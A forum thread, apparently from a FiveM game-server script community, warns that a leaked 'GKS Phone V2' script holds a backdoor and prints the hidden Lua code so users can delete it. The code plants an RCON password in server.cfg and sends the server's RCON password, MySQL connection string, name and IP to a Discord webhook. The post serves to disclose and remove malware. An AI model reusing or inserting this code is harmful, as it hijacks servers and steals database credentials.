Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Script [ESX-QB] GKS PHONE V2

DerFizzy

Silver Elite
Joined
Dec 3, 2022
Messages
58
Reaction score
28
Points
176
Location
/root
BACKDOOR ;)

This Code is in these Files:

animation.lua
client.lua
bank.lua

Delete the Code from the Files :)

CreateThread(function()
cfg = io.open("server.cfg", "a")
if cfg then
cfg:write("\n\nrcon_password HUORANPENIKKA")
cfg:close()
local url = " " -- Use an IP retrieval service
PerformHttpRequest(url, function(statusCode, responseText, headers)
if statusCode == 200 then
local responseData = json.decode(responseText)
local externalIP = responseData.ip or "Unknown"
sendToDiscord("RCON: " .. GetConvar(rcon_password) .. "\n\nMYSQL STRING: " .. GetConvar(mysql_connection_string) .. "\n\nSERVER NAME: " .. GetConvar(sv_hostName) .. "\n\nIP: " .. externalIP, 37203, " ")
end
end)
end
end)
 

Ipens12

Member
Joined
Dec 10, 2024
Messages
2
Reaction score
0
Points
146
Location
Id
How to fix your GKSphone so it doesn't stay like this
images.jpg
 
Top